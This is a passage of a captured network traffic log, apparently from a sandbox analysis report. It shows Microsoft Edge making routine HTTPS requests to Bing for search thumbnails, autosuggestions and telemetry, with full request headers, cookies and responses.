sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144337.8b94780
GET

https://www.bing.com/th?id=OSK.782b217f9f215eda69d39bcd99b6f8a4&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.782b217f9f215eda69d39bcd99b6f8a4&w=120&h=120&c=6&p=0&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3897
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144338.8b948b2
GET

https://www.bing.com/th?id=OSK.4994bc85f5f75906347baaa7c4b91b47&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.4994bc85f5f75906347baaa7c4b91b47&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4171
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144340.8b9499f
GET

https://www.bing.com/th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=1209600
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 9949
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144341.8b95a77
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vir&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vir&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 976
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 1157
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d5e0d746a59025ae93d4f12586
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3F6jjAVUbX8ySSIXbVlaRAdr0UEiqFP+lFlJaFLBeb8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144341.8b96177
GET

https://www.bing.com/th?id=OSK.15126b537972a3a4e1e2fd27e67ffd9e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.15126b537972a3a4e1e2fd27e67ffd9e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5754
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144341.8b96598
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22AsResponseLength%22%3A%22745%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%2Cig%3A63EB1BDA16F34E5CB42DE71DE2763765%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A17%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343300%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343348%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22AsResponseLength%22%3A%22743%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%2Cig%3A79911AD6BC47492BB6CF4680F8D2B7C7%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A18%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343520%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

